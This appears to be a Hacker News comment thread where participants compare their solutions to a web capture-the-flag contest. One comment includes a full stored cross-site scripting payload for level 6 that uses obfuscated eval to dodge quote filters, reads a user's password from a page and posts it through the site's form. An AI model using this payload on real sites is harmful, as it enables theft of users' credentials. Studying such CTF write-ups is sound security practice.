Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Very similar to the methods I used :)

On level 5 I used a textfile on the compromised level 2 server instead of the 'cleaner' method shown here.

On level 6 I used some more JS:

}];</script><script type=text/html id=payload>$.get(/user-hfbnljhhim/user_info).done(function(data) { var pwd = escape($(data).find(table tr td:last).text()); $(#title).val(pwd); $(#content).val(pwd); $(form).unbind(submit); $(form).trigger(submit); } )</script><script type=text/javascript>$(function() {eval(String.fromCharCode(118,97,114,32,112,97,121,108,111,97,100,32,61,32,39,35,112,97,121,108,111,97,100,39)); eval($(payload).text().replace(/[*]/g, String.fromCharCode(39))); var post_data = [{}];});</script><script> var t = [{

It's funny to see how similar the python script is in level 8 with what I wrote, would be cool to see more writeups on this one with different solutions :)



Here's my level 6 https://gist.github.com/3526645

At first I was trying to use jQuery selectors to get only the table cell with the password in it but in the end I found it much easier to just post the entire page and worry about it later.

Of course there are endless ways to do it! I had much fun with the CTF this time around since I actually knew what I was doing.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: